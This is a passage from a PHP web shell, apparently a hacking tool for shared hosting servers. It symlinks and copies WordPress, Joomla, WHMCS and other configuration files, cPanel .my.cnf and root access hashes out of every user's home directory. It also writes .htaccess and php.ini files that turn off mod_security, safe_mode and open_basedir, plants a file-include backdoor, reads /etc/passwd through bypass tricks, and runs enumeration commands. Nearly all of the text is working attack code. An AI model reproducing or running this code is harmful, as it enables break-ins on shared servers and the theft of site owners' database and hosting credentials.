  3245. @symlink("/home/$i/public_html/whmc/WHM/configuration.php","sym/$i-whmc-WHM.txt");
  3246. @symlink("/home/$i/public_html/whmcs/configuration.php","sym/$i-whmcs.txt");
  3247. @symlink("/home/$i/public_html/support/configuration.php","sym/$i-support.txt");
  3248. @symlink("/home/$i/public_html/supp/configuration.php","sym/$i-supp.txt");
  3249. @symlink("/home/$i/public_html/secure/configuration.php","sym/$i-sucure.txt");
  3250. @symlink("/home/$i/public_html/secure/whm/configuration.php","sym/$i-sucure-whm.txt");
  3251. @symlink("/home/$i/public_html/secure/whmcs/configuration.php","sym/$i-sucure-whmcs.txt");
  3252. @symlink("/home/$i/public_html/cpanel/configuration.php","sym/$i-cpanel.txt");
  3253. @symlink("/home/$i/public_html/panel/configuration.php","sym/$i-panel.txt");
  3254. @symlink("/home/$i/public_html/host/configuration.php","sym/$i-host.txt");
  3255. @symlink("/home/$i/public_html/hosting/configuration.php","sym/$i-hosting.txt");
  3256. @symlink("/home/$i/public_html/hosts/configuration.php","sym/$i-hosts.txt");
  3257. @symlink("/home/$i/public_html/configuration.php","sym/$i-joomla.txt");
  3258. @symlink("/home/$i/public_html/submitticket.php","sym/$i-whmcs2.txt");
  3259. @symlink("/home/$i/public_html/clients/configuration.php","sym/$i-clients.txt");
  3260. @symlink("/home/$i/public_html/client/configuration.php","sym/$i-client.txt");
  3261. @symlink("/home/$i/public_html/clientes/configuration.php","sym/$i-clientes.txt");
  3262. @symlink("/home/$i/public_html/cliente/configuration.php","sym/$i-client.txt");
  3263. @symlink("/home/$i/public_html/clientsupport/configuration.php","sym/$i-clientsupport.txt");
  3264. @symlink("/home/$i/public_html/billing/configuration.php","sym/$i-billing.txt");
  3265. @symlink("/home/$i/public_html/manage/configuration.php","sym/$i-whm-manage.txt");
  3266. @symlink("/home/$i/public_html/my/configuration.php","sym/$i-whm-my.txt");
  3267. @symlink("/home/$i/public_html/myshop/configuration.php","sym/$i-whm-myshop.txt");
  3268. @symlink("/home/$i/public_html/includes/dist-configure.php","sym/$i-zencart.txt");
  3269. @symlink("/home/$i/public_html/zencart/includes/dist-configure.php","sym/$i-shop-zencart.txt");
  3270. @symlink("/home/$i/public_html/shop/includes/dist-configure.php","sym/$i-shop-ZCshop.txt");
  3271. @symlink("/home/$i/public_html/Settings.php","sym/$i-smf.txt");
  3272. @symlink("/home/$i/public_html/smf/Settings.php","sym/$i-smf2.txt");
  3273. @symlink("/home/$i/public_html/forum/Settings.php","sym/$i-smf-forum.txt");
  3274. @symlink("/home/$i/public_html/forums/Settings.php","sym/$i-smf-forums.txt");
  3275. @symlink("/home/$i/public_html/upload/includes/config.php","sym/$i-up.txt");
  3276. @symlink("/home/$i/public_html/article/config.php","sym/$i-Nwahy.txt");
  3277. @symlink("/home/$i/public_html/up/includes/config.php","sym/$i-up2.txt");
  3278. @symlink("/home/$i/public_html/conf_global.php","sym/$i-6.txt");
  3279. @symlink("/home/$i/public_html/include/db.php","sym/$i-7.txt");
  3280. @symlink("/home/$i/public_html/connect.php","sym/$i-PHP-Fusion.txt");
  3281. @symlink("/home/$i/public_html/mk_conf.php","sym/$i-9.txt");
  3282. @symlink("/home/$i/public_html/includes/config.php","sym/$i-traidnt1.txt");
  3283. @symlink("/home/$i/public_html/config.php","sym/$i-4images.txt");
  3284. @symlink("/home/$i/public_html/sites/default/settings.php","sym/$i-Drupal.txt");
  3285. @symlink("/home/$i/public_html/member/configuration.php","sym/$i-1member-configuration425.txt");
  3286. @symlink("/home/$i/public_html/billings/configuration.php","sym/$i-billings.txt");
  3287. @symlink("/home/$i/public_html/whm/configuration.php","sym/$i-whm.txt");
  3288. @symlink("/home/$i/public_html/supports/configuration.php","sym/$i-supports.txt");
  3289. @symlink("/home/$i/public_html/requires/config.php","sym/$i-AM4SS-hosting.txt");
  3290. @symlink("/home/$i/public_html/supports/includes/iso4217.php","sym/$i-hostbills-supports.txt");
  3291. @symlink("/home/$i/public_html/client/includes/iso4217.php","sym/$i-hostbills-client.txt");
  3292. @symlink("/home/$i/public_html/support/includes/iso4217.php","sym/$i-hostbills-support.txt");
  3293. @symlink("/home/$i/public_html/billing/includes/iso4217.php","sym/$i-hostbills-billing.txt");
  3294. @symlink("/home/$i/public_html/billings/includes/iso4217.php","sym/$i-hostbills-billings.txt");
  3295. @symlink("/home/$i/public_html/host/includes/iso4217.php","sym/$i-hostbills-host.txt");
  3296. @symlink("/home/$i/public_html/hosts/includes/iso4217.php","sym/$i-hostbills-hosts.txt");
  3297. @symlink("/home/$i/public_html/hosting/includes/iso4217.php","sym/$i-hostbills-hosting.txt");
  3298. @symlink("/home/$i/public_html/hostings/includes/iso4217.php","sym/$i-hostbills-hostings.txt");
  3299. @symlink("/home/$i/public_html/includes/iso4217.php","sym/$i-hostbills.txt");
  3300. @symlink("/home/$i/public_html/hostbills/includes/iso4217.php","sym/$i-hostbills-hostbills.txt");
  3301. @symlink("/home/$i/public_html/hostbill/includes/iso4217.php","sym/$i-hostbills-hostbill.txt");
  3302. @symlink("/home/$i/public_html/bb-config.php","sym/$i-bb-config.txt");
  3303.  
  3304. @copy("/root/.accesshash","root_AccessHash.txt");
  3305. @copy("/home/$i/.my.cnf","$i-my.cnf_cPanel.txt");
  3306. @copy("/home/$i/.accesshash","$i-AccessHash_Whm.txt");
  3307. @copy("/home/$i/public_html/includes/configure.php","$i-shop.txt");
  3308. @copy("/home/$i/public_html/soporte/configuration.php","$i-soporte-whmcs.txt");
  3309. @copy("/home/$i/public_html/painel-do-cliente/configuration.php","$i-painel-do-cliente-whmcs.txt");
  3310. @copy("/home/$i/public_html/financeiro/configuration.php","$i-financeiro_whmcs.txt");
  3311. @copy("/home/$i/public_html/os/includes/configure.php","$i-shop-os.txt");
  3312. @copy("/home/$i/public_html/oscom/includes/configure.php","$i-oscom.txt");
  3313. @copy("/home/$i/public_html/oscommerce/includes/configure.php","$i-oscommerce.txt");
  3314. @copy("/home/$i/public_html/oscommerces/includes/configure.php","$i-oscommerces.txt");
  3315. @copy("/home/$i/public_html/shop/includes/configure.php","$i-shop2.txt");
  3316. @copy("/home/$i/public_html/shopping/includes/configure.php","$i-shop-shopping.txt");
  3317. @copy("/home/$i/public_html/sale/includes/configure.php","$i-sale.txt");
  3318. @copy("/home/$i/public_html/amember/config.inc.php","$i-amember.txt");
  3319. @copy("/home/$i/public_html/config.inc.php","$i-amember2.txt");
  3320. @copy("/home/$i/public_html/members/configuration.php","$i-members.txt");
  3321. @copy("/home/$i/public_html/config.php","$i-4images1.txt");
  3322. @copy("/home/$i/public_html/forum/includes/config.php","$i-forum.txt");
  3323. @copy("/home/$i/public_html/forums/includes/config.php","$i-forums.txt");
  3324. @copy("/home/$i/public_html/admin/conf.php","$i-5.txt");
  3325. @copy("/home/$i/public_html/admin/config.php","$i-4.txt");
  3326. @copy("/home/$i/public_html/wp-config.php","$i-WordPress.txt");
  3327. @copy("/home/$i/public_html/wp/wp-config.php","$i-WordPress-wp.txt");
  3328. @copy("/home/$i/public_html/WP/wp-config.php","$i-WordPress-WP.txt");
  3329. @copy("/home/$i/public_html/wp/beta/wp-config.php","$i-WordPress-wp-beta.txt");
  3330. @copy("/home/$i/public_html/beta/wp-config.php","$i-WordPress-beta.txt");
  3331. @copy("/home/$i/public_html/press/wp-config.php","$i-WordPress-press.txt");
  3332. @copy("/home/$i/public_html/wordpress/wp-config.php","$i-WordPress-wordpress.txt");
  3333. @copy("/home/$i/public_html/Wordpress/wp-config.php","$i-WordPress-Wordpress.txt");
  3334. @copy("/home/$i/public_html/blog/wp-config.php","$i-WordPress-Wordpress.txt");
  3335. @copy("/home/$i/public_html/wordpress/beta/wp-config.php","$i-WordPress-wordpress-beta.txt");
  3336. @copy("/home/$i/public_html/news/wp-config.php","$i-WordPress-news.txt");
  3337. @copy("/home/$i/public_html/new/wp-config.php","$i-WordPress-new.txt");
  3338. @copy("/home/$i/public_html/blog/wp-config.php","$i-WordPress-blog.txt");
  3339. @copy("/home/$i/public_html/beta/wp-config.php","$i-WordPress-beta.txt");
  3340. @copy("/home/$i/public_html/blogs/wp-config.php","$i-WordPress-blogs.txt");
  3341. @copy("/home/$i/public_html/home/wp-config.php","$i-WordPress-home.txt");
  3342. @copy("/home/$i/public_html/protal/wp-config.php","$i-WordPress-protal.txt");
  3343. @copy("/home/$i/public_html/site/wp-config.php","$i-WordPress-site.txt");
  3344. @copy("/home/$i/public_html/main/wp-config.php","$i-WordPress-main.txt");
  3345. @copy("/home/$i/public_html/test/wp-config.php","$i-WordPress-test.txt");
  3346. @copy("/home/$i/public_html/arcade/functions/dbclass.php","$i-ibproarcade.txt");
  3347. @copy("/home/$i/public_html/arcade/functions/dbclass.php","$i-ibproarcade.txt");
  3348. @copy("/home/$i/public_html/joomla/configuration.php","$i-joomla2.txt");
  3349. @copy("/home/$i/public_html/protal/configuration.php","$i-joomla-protal.txt");
  3350. @copy("/home/$i/public_html/joo/configuration.php","$i-joo.txt");
  3351. @copy("/home/$i/public_html/cms/configuration.php","$i-joomla-cms.txt");
  3352. @copy("/home/$i/public_html/site/configuration.php","$i-joomla-site.txt");
  3353. @copy("/home/$i/public_html/main/configuration.php","$i-joomla-main.txt");
  3354. @copy("/home/$i/public_html/news/configuration.php","$i-joomla-news.txt");
  3355. @copy("/home/$i/public_html/new/configuration.php","$i-joomla-new.txt");
  3356. @copy("/home/$i/public_html/home/configuration.php","$i-joomla-home.txt");
  3357. @copy("/home/$i/public_html/vb/includes/config.php","$i-vb-config.txt");
  3358. @copy("/home/$i/public_html/vb3/includes/config.php","$i-vb3-config.txt");
  3359. @copy("/home/$i/public_html/cc/includes/config.php","$i-vb1-config.txt");
  3360. @copy("/home/$i/public_html/includes/config.php","$i-includes-vb.txt");
  3361. @copy("/home/$i/public_html/forum/includes/class_core.php","$i-vbluttin-class_core.php.txt");
  3362. @copy("/home/$i/public_html/vb/includes/class_core.php","$i-vbluttin-class_core.php1.txt");
  3363. @copy("/home/$i/public_html/cc/includes/class_core.php","$i-vbluttin-class_core.php2.txt");
  3364. @copy("/home/$i/public_html/cliente/configuration.php","$i-whmcs_cliente.txt");
  3365. @copy("/home/$i/public_html/whm/configuration.php","$i-whm15.txt");
  3366. @copy("/home/$i/public_html/central/configuration.php","$i-whm-central.txt");
  3367. @copy("/home/$i/public_html/whm/whmcs/configuration.php","$i-whm-whmcs.txt");
  3368. @copy("/home/$i/public_html/whm/WHMCS/configuration.php","$i-whm-WHMCS.txt");
  3369. @copy("/home/$i/public_html/whmc/WHM/configuration.php","$i-whmc-WHM.txt");
  3370. @copy("/home/$i/public_html/whmcs/configuration.php","$i-whmcs.txt");
  3371. @copy("/home/$i/public_html/support/configuration.php","$i-support.txt");
  3372. @copy("/home/$i/public_html/supp/configuration.php","$i-supp.txt");
  3373. @copy("/home/$i/public_html/secure/configuration.php","$i-sucure.txt");
  3374. @copy("/home/$i/public_html/secure/whm/configuration.php","$i-sucure-whm.txt");
  3375. @copy("/home/$i/public_html/secure/whmcs/configuration.php","$i-sucure-whmcs.txt");
  3376. @copy("/home/$i/public_html/cpanel/configuration.php","$i-cpanel.txt");
  3377. @copy("/home/$i/public_html/panel/configuration.php","$i-panel.txt");
  3378. @copy("/home/$i/public_html/host/configuration.php","$i-host.txt");
  3379. @copy("/home/$i/public_html/hosting/configuration.php","$i-hosting.txt");
  3380. @copy("/home/$i/public_html/hosts/configuration.php","$i-hosts.txt");
  3381. @copy("/home/$i/public_html/configuration.php","$i-joomla.txt");
  3382. @copy("/home/$i/public_html/submitticket.php","$i-whmcs2.txt");
  3383. @copy("/home/$i/public_html/clients/configuration.php","$i-clients.txt");
  3384. @copy("/home/$i/public_html/client/configuration.php","$i-client.txt");
  3385. @copy("/home/$i/public_html/clientes/configuration.php","$i-clientes.txt");
  3386. @copy("/home/$i/public_html/cliente/configuration.php","$i-client.txt");
  3387. @copy("/home/$i/public_html/clientsupport/configuration.php","$i-clientsupport.txt");
  3388. @copy("/home/$i/public_html/billing/configuration.php","$i-billing.txt");
  3389. @copy("/home/$i/public_html/manage/configuration.php","$i-whm-manage.txt");
  3390. @copy("/home/$i/public_html/my/configuration.php","$i-whm-my.txt");
  3391. @copy("/home/$i/public_html/myshop/configuration.php","$i-whm-myshop.txt");
  3392. @copy("/home/$i/public_html/includes/dist-configure.php","$i-zencart.txt");
  3393. @copy("/home/$i/public_html/zencart/includes/dist-configure.php","$i-shop-zencart.txt");
  3394. @copy("/home/$i/public_html/shop/includes/dist-configure.php","$i-shop-ZCshop.txt");
  3395. @copy("/home/$i/public_html/Settings.php","$i-smf.txt");
  3396. @copy("/home/$i/public_html/smf/Settings.php","$i-smf2.txt");
  3397. @copy("/home/$i/public_html/forum/Settings.php","$i-smf-forum.txt");
  3398. @copy("/home/$i/public_html/forums/Settings.php","$i-smf-forums.txt");
  3399. @copy("/home/$i/public_html/upload/includes/config.php","$i-up.txt");
  3400. @copy("/home/$i/public_html/article/config.php","$i-Nwahy.txt");
  3401. @copy("/home/$i/public_html/up/includes/config.php","$i-up2.txt");
  3402. @copy("/home/$i/public_html/conf_global.php","$i-6.txt");
  3403. @copy("/home/$i/public_html/include/db.php","$i-7.txt");
  3404. @copy("/home/$i/public_html/connect.php","$i-PHP-Fusion.txt");
  3405. @copy("/home/$i/public_html/mk_conf.php","$i-9.txt");
  3406. @copy("/home/$i/public_html/includes/config.php","$i-traidnt1.txt");
  3407. @copy("/home/$i/public_html/config.php","$i-4images.txt");
  3408. @copy("/home/$i/public_html/sites/default/settings.php","$i-Drupal.txt");
  3409. @copy("/home/$i/public_html/member/config.php","$i-1member-config.txt");
  3410. @copy("/home/$i/public_html/member/configuration.php","$i-1member-configuration.txt");
  3411. @copy("/home/$i/public_html/members/config.php","$i-1member.txt");
  3412. @copy("/home/$i/public_html/members/configuration.php","$i-1member.txt");
  3413. @copy("/home/$i/public_html/billings/configuration.php","$i-billings.txt");
  3414. @copy("/home/$i/public_html/whm/configuration.php","$i-whm.txt");
  3415. @copy("/home/$i/public_html/supports/configuration.php","$i-supports.txt");
  3416. @copy("/home/$i/public_html/requires/config.php","$i-AM4SS-hosting.txt");
  3417. @copy("/home/$i/public_html/supports/includes/iso4217.php","$i-hostbills-supports.txt");
  3418. @copy("/home/$i/public_html/client/includes/iso4217.php","$i-hostbills-client.txt");
  3419. @copy("/home/$i/public_html/support/includes/iso4217.php","$i-hostbills-support.txt");
  3420. @copy("/home/$i/public_html/billing/includes/iso4217.php","$i-hostbills-billing.txt");
  3421. @copy("/home/$i/public_html/billings/includes/iso4217.php","$i-hostbills-billings.txt");
  3422. @copy("/home/$i/public_html/host/includes/iso4217.php","$i-hostbills-host.txt");
  3423. @copy("/home/$i/public_html/hosts/includes/iso4217.php","$i-hostbills-hosts.txt");
  3424. @copy("/home/$i/public_html/hosting/includes/iso4217.php","$i-hostbills-hosting.txt");
  3425. @copy("/home/$i/public_html/hostings/includes/iso4217.php","$i-hostbills-hostings.txt");
  3426. @copy("/home/$i/public_html/includes/iso4217.php","$i-hostbills.txt");
  3427. @copy("/home/$i/public_html/hostbills/includes/iso4217.php","$i-hostbills-hostbills.txt");
  3428. @copy("/home/$i/public_html/hostbill/includes/iso4217.php","$i-hostbills-hostbill.txt");
  3429. @copy("/home/$i/public_html/bb-config.php","$i-bb-config.txt");
  3430. }
  3431. echo "<a href='hacked/auto_grab' target='_blank'><span class='b9'>Intip</span></a><br/></center>";
  3432. }elseif(isset($_GET['x'])&&($_GET['x']=='adminer')){
  3433. $file=toolurl("http://github.com/vrana/adminer/releases/download/v4.3.1/adminer-4.3.1.php");
  3434. simpan('adminercok.php',$file);
  3435. echo "<br /><center><span class='b7'>Generate file adminercok.php succesfully</span><br/><a href='adminercok.php' target='_blank'><span class='b9'>Adminer</span></a><br/></center>";
  3436.  
  3437. }elseif(isset($_GET['x'])&&($_GET['x']=='dmsec1')){
  3438. $jablay="<IfModule mod_security.c>\nSecFilterEngine OFF\nSecFilterScanPOST OFF\n</IfModule>";
  3439. $kimcil="<?php\necho ini_get(\"safe_mode\");\necho ini_get(\"open_basedir\");\ninclude(\$_GET[\"file\"]);\nini_restore(\"safe_mode\");\nini_restore(\"open_basedir\");\necho ini_get(\"safe_mode\");\necho ini_get(\"open_basedir\");\ninclude(\$_GET[\"ss\"]);\n?>";
  3440. simpan('.htaccess',$jablay);
  3441. simpan('ini.php',$kimcil);
  3442. $kobel="<center><br/><br/><b><span class='b7'>O=:[ BYPASS HTACCESS ]:=O</span></b><br/><br/><span class='b9'>Generate htaccess & ini.php Successfully :)</span><br/><br/><br/></center>";
  3443. echo $kobel;
  3444.  
  3445. }elseif(isset($_GET['x'])&&($_GET['x']=='dmsec2')){
  3446. echo'<center><br/><br/><b><span class="b7">O=:[ BYPASS PHP.INI ]:=O</span></b><br/><br/>';
  3447. simpan('php.ini',"safe_mode=OFF\nsafe_mode_gid=OFF\ndisable_functions=NONE\ndisable_classes=NONE\nopen_basedir=OFF\nsuhosin.executor.func.blacklist=NONE");
  3448. if(file_exists($pwd.'php.ini')){
  3449. echo'<span class="b9">Generate php.ini Successfully :)</span><br/><br/><br/></center>';
  3450. }else{
  3451. echo'<span class="b9">Generate php.ini Failed :)</span><br/><br/><br/></center>';
  3452. }
  3453.  
  3454. }elseif(isset($_GET['x'])&&($_GET['x']=='dmsec3')){
  3455. echo "<br/><table style='margin: auto; width: 100%; text-align: center;'><tr>
  3456. <td colspan='3'> <center><b><span class='b7'>O=:[ BYPASS BASEDIR ]:=O</span></b><br/><br/></center> </td>
  3457. </tr>
  3458. <tr>
  3459. <td>[~] Bypass Basedir cURL [~]</td>
  3460. <td>[~] Bypass Basedir copy() [~]</td>
  3461. </tr>
  3462. <tr>
  3463. <td><form method='post' name='bypasser'>
  3464. FILE:<input type='text' value='/etc/passwd' name='file_bypass'> <input type='submit' name='curl_bypass' value='Bypass'></form></td>
  3465. <td><form method='post' name='bypasser'> FILE COPY TO:<input type='text' style='width: 250px;' name='dest' value='" . CleanDir(getcwd())."/maho.txt'> <input type='text' value='/etc/passwd' name='file_bypass'> <input type='submit' name='copy_bypass' value='Bypass'>
  3466. </form>
  3467. </td>
  3468. </table>";
  3469. if(isset($_POST['curl_bypass'])) {
  3470. @error_reporting(0);
  3471. $ch=curl_init("file://$_POST[file_bypass]");
  3472. curl_setopt($ch, CURLOPT_HEADERS, 0);
  3473. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3474. $file_out=curl_exec($ch);
  3475. curl_close($ch);
  3476. echo "<br/><center><textarea>" . htmlspecialchars($file_out)."</textarea></br></br>";
  3477. }elseif(isset($_POST['copy_bypass'])) {
  3478. if(@copy($_POST['file_bypass'],$_POST['dest'])) {
  3479. @$fh=fopen($_POST['dest'], 'r');
  3480. echo "<br/><center><textarea>" . htmlspecialchars(@fread($fh, filesize($_POST['dest'])))."</textarea></br></br>";
  3481. @fclose($fh);
  3482. } else
  3483. echo "<center><br/><br/>
  3484. <h1>O=:[ BYPASS DENIED ]:=O</h1><br></br>";
  3485. }
  3486. }elseif(isset($_GET['x'])&&($_GET['x']=='dmsec4')){
  3487. echo "<center><br/><br/><b><span class='b7'>O=:[ BYPASS PROCESS ]:=O</span></b><br/><br/>";
  3488. if($win) {
  3489. echo "<form method='post'>
  3490. <select name='windowsprocess'>
  3491. <option name='systeminfo'>System Info</option>
  3492. <option name='active'>Active Connections</option>
  3493. <option name='runningserv'>Running Services</option>
  3494. <option name='useracc'>User Accounts</option>
  3495. <option name='showcom'>Show Computers</option>
  3496. <option name='arptab'>ARP Table</option>
  3497. <option name='ipconf'>IP Configuration</option></select>
  3498. <input type='submit' class='inputzbut' name='submitwinprocess' value='View'>
  3499. </form>";
  3500. }else{
  3501. echo "<form method='post'>
  3502. <select name='nonwindowsprocess'>
  3503. <option name='prs'>Process</option>
  3504. <option name='passwd'>Passwd</option>
  3505. <option name='varmail'>var mail</option>
  3506. <option name='syslog'>Syslog</option>
  3507. <option name='resolv'>Resolv</option>
  3508. <option name='hosts'>Hosts</option>
  3509. <option name='cpuinfo'>Cpuinfo</option>
  3510. <option name='version'>Version</option>
  3511. <option name='sbin'>Sbin</option>
  3512. <option name='interrupts'>Interrupts</option>
  3513. <option name='lsattr'>lsattr</option>
  3514. <option name='uptime'>Uptime</option>
  3515. <option name='fstab'>Fstab</option>
  3516. <option name='hddspace'>HDD Space</option>
  3517. </select>
  3518. <input type='submit' class='inputzbut' name='submitnonwinprocess' value=' >> '></form>";
  3519. }
  3520. $windowsprocess=$_POST['windowsprocess'];
  3521. $nonwindowsprocess=$_POST['nonwindowsprocess'];
  3522. if($windowsprocess=="System Info")
  3523. $winruncom="systeminfo";
  3524. if($windowsprocess=="Active Connections")
  3525. $winruncom="netstat -an";
  3526. if($windowsprocess=="Running Services")
  3527. $winruncom="net start";
  3528. if($windowsprocess=="User Accounts")
  3529. $winruncom="net user";
  3530. if($windowsprocess=="Show Computers")
  3531. $winruncom="net view";
  3532. if($windowsprocess=="ARP Table")
  3533. $winruncom="arp -a";
  3534. if($windowsprocess=="IP Configuration")
  3535. $winruncom="ipconfig /all";
  3536. if($nonwindowsprocess=="Syslog")
  3537. $winruncom="cat /etc/syslog.conf";
  3538. if($nonwindowsprocess=="Resolv")
  3539. $winruncom="cat /etc/resolv.conf";
  3540. if($nonwindowsprocess=="Hosts")
  3541. $winruncom="cat /etc/hosts";
  3542. if($nonwindowsprocess=="Passwd")
  3543. $winruncom="cat /etc/passwd";
  3544. if($nonwindowsprocess=="varmail")
  3545. $winruncom="ls /var/mail";
  3546. if($nonwindowsprocess=="cpuinfo")
  3547. $winruncom="cat /proc/cpuinfo";
  3548. if($nonwindowsprocess=="Version")
  3549. $winruncom="cat /proc/version";
  3550. if($nonwindowsprocess=="Sbin")
  3551. $winruncom="ls -al /usr/sbin";
  3552. if($nonwindowsprocess=="Process")
  3553. $winruncom="ps aux";
  3554. if($nonwindowsprocess=="Interrupts")
  3555. $winruncom="cat /proc/interrupts";
  3556. if($nonwindowsprocess=="lsattr")
  3557. $winruncom="lsattr -va";
  3558. if($nonwindowsprocess=="Uptime")
  3559. $winruncom="uptime";
  3560. if($nonwindowsprocess=="Fstab")
  3561. $winruncom="cat /etc/fstab";
  3562. if($nonwindowsprocess=="HDD Space")
  3563. $winruncom="df -h";
  3564. if(isset($winruncom)) {
  3565. echo "<table class='cmdbox'><tbody><tr><td colspan='2'><textarea class='output' name='content' onclick=\"this.focus(); this.select();\">" . exe($winruncom)."</textarea></td></tr></table></center>";
  3566. }
  3567. if(isset($systeminfo)) {
  3568. echo "<br><br>";
  3569. dmprocess();
  3570. }
  3571.  
  3572. }elseif(isset($_GET['x'])&&($_GET['x']=='dmsym1')){
  3573. if($win) {
  3574. echo "<center><br/><br/><span class='b9'>Symlink Is Not Available In Windows Server</span><br/><br/></center>";
  3575. }
  3576. if(!is_dir('hacked')){
  3577. mkdir('hacked',0777);
  3578. }
  3579. chdir('hacked');
  3580. mkdir('dm1sym', 0777);
  3581. chdir('dm1sym');
  3582. $sempak="Options all\nDirectoryIndex dm.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nSatisfy Any";
  3583. simpan('.htaccess',$sempak);
  3584. symlink('/','dm_root');
  3585. if(is_readable("/var/named")) {
  3586. echo '<center><br/><br/><b><span class="b7">O=:[ SYMLINK VAR/NAMED ]:=O</span></b><br/><br/></center>
  3587. <table align="center" border="1" width="400" cellspacing="1" cellpadding="4" style="border-collapse: collapse">
  3588. <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
  3589. <td align="center"> <font color="white"> <b>_USERS_</b></td>
  3590. <td align="center"> <font color="white"> <b>_SYMLINK_</b></center></td>';
  3591. $list=scandir('/var/named');
  3592. foreach($list as $domain){
  3593. if(strpos($domain,'.db')){
  3594. $domain=str_replace('.db','',$domain);
  3595. $owner=posix_getpwuid(fileowner('/etc/valiases/'.$domain));
  3596. echo "<tr>
  3597. <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
  3598. <td align='center'><font color='white'>".$owner['name']."</td>
  3599. <td align='center'><a href='hacked/dm1sym/dm_root".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
  3600. }
  3601. }
  3602. flush();
  3603. flush();
  3604. echo"</tr></table>";
  3605. }else{
  3606. echo '<center><br/><br/><b><span class="b7">O=:[ SYMLINK VAR/NAMED ]:=O</span></b><br/><br/> /var/named Not Readable</center>';
  3607. }
  3608.  
  3609. }elseif(isset($_GET['x'])&&($_GET['x']=='dmsym2')){
  3610. if($win) {
  3611. echo "<center><br/><br/><span class='b9'>Symlink Is Not Available In Windows Server</span><br/><br/></center>";
  3612. }
  3613. if(!is_dir('hacked')){
  3614. mkdir('hacked',0777);
  3615. }
  3616. chdir('hacked');
  3617. mkdir('dm2sym', 0777);
  3618. chdir('dm2sym');
  3619. $sempak="Options all\nDirectoryIndex dm.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nSatisfy Any";
  3620. simpan('.htaccess',$sempak);
  3621. symlink('/','dm_root');
  3622. if(is_readable('/etc/passwd')) {
  3623. $isikarung=file_get_contents('/etc/passwd');
  3624. simpan('maho.txt',$isikarung);
  3625. }
  3626. if(isset($_GET['file'])or filesize('maho.txt')>0) {
  3627. $cont=stripcslashes($_POST['file']);
  3628. if(!file_exists('maho.txt')) {
  3629. $f=fopen('maho.txt','w');
  3630. $w=fwrite($f,$cont);
  3631. fclose($f);
  3632. }
  3633. if($w or filesize('maho.txt')>0) {
  3634. echo "<center><br/><br/><b><span class='b7'>O=:[ SYMLINK ETC/PASSWD- ]:=O</span></b><br/><br/>
  3635. <table align='center' border='1' cellspacing='1' cellpadding='4' style='border-collapse: collapse'>
  3636. <td align='center'> <font color='white'> <b>_USERS_</b></td>
  3637. <td align='center'> <font color='white'> <b>_SYMLINK_</b></td>";
  3638. flush();
  3639. $fil3=file('maho.txt');
  3640. foreach($fil3 as $f) {
  3641. $u=explode(':',$f);
  3642. $user=$u['0'];
  3643. echo "<tr>
  3644. <td align='center'><font color='white'>$user</td>
  3645. <td align='center'><a class='dm' href='hacked/dm2sym/dm_root/home/$user/public_html' target='_blank'>Symlink</a></td></tr>";
  3646. flush();
  3647. flush();
  3648. }
  3649. echo "</tr></table>";
  3650. }else{
  3651. echo '<center><br/><br/><b><span class="b7">O=:[ SYMLINK /ETC/PASSWD ]:=O</span></b><br/><br/> /etc/passwd Not Readable</center>';
  3652. }
  3653. }
  3654.  
  3655. }elseif(isset($_GET['x'])&&($_GET['x']=='dmsym3')){
  3656. if($win) {
  3657. echo "<center><br/><br/><span class='b9'>Symlink Is Not Available In Windows Server</span><br/><br/></center>";
  3658. }
  3659. if(!is_dir('hacked')){
  3660. mkdir('hacked',0777);
  3661. }
  3662. chdir('hacked');
  3663. mkdir('dm3sym', 0777);
  3664. chdir('dm3sym');
  3665. $sempak="Options all\nDirectoryIndex dm.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nSatisfy Any";
  3666. simpan('.htaccess',$sempak);
  3667. symlink('/','dm_root');
  3668. if(is_readable("/etc/passwd")) {
  3669. echo'<center><br/><br/><b><span class="b7">O=:[ SYMLINK ETC/PASSWD ]:=O</span></b><br/><br/> <table align="center" border="1" width="400" cellspacing="1" cellpadding="4" style="border-collapse: collapse">';
  3670. if(scandir('/var/named')){
  3671. echo'<tr><th align="center"> <font color="white"> <b>_DOMAINS_</b></th>
  3672. <th align="center"> <font color="white"> <b>_USERS_</b></th>
  3673. <th align="center"> <font color="white"> <b>_SYMLINK_</b></th>';
  3674.  
  3675. $etcz=explode("\n",file_get_contents('/etc/passwd'));
  3676. $list=scandir('/var/named');
  3677. foreach($etcz as $etz) {
  3678. $etcc=explode(':',$etz);
  3679. foreach($list as $domain) {
  3680. if(strpos($domain, '.db')) {
  3681. $domain=str_replace('.db','',$domain);
  3682. $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
  3683. if($owner['name']==$etcc[0]) {
  3684. echo "<tr>
  3685. <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
  3686. <td align='center'><font color='white'>".$owner['name']."</font></td>
  3687. <td align='center'><a href='hacked/dm3sym/dm_root".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
  3688. }
  3689. }
  3690. }
  3691. }
  3692. }else{
  3693. echo '<center><br/><br/><b><span class="b7">O=:[ SYMLINK /VAR/NAMED ]:=O</span></b><br/><br/> /var/named Not Readable</center>';
  3694. }
  3695. flush();
  3696. flush();
  3697. }else{
  3698. echo '<center><br/><br/><b><span class="b7">O=:[ SYMLINK /ETC/PASSWD ]:=O</span></b><br/><br/> /etc/passwd Not Readable</center>';
  3699. }
  3700. echo "</tr></table>";
  3701.  
  3702. }elseif(isset($_GET['x'])&&($_GET['x']=='dmsym4')){
  3703. if($win) {
  3704. echo "<center><br/><br/><span class='b9'>Symlink Is Not Available In Windows Server</span><br/><br/></center>";
  3705. }
  3706. if(!is_dir('hacked')){
  3707. mkdir('hacked',0777);
  3708. }
  3709. chdir('hacked');
  3710. mkdir('dm4sym', 0777);
  3711. chdir('dm4sym');
  3712. $sempak="Options all\nDirectoryIndex dm.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nSatisfy Any";
  3713. simpan('.htaccess',$sempak);
  3714. symlink('/','dm.txt');
  3715. if(is_readable("/etc/named.conf")){
  3716. echo'<center><br/><br/><b><span class="b7">O=:[ SYMLINK ETC/NAMED.CONF ]:=O</span></b><br/><br/> <table align="center" border="1" width="400" cellspacing="1" cellpadding="4" style="border-collapse: collapse">';
  3717. echo'<tr>
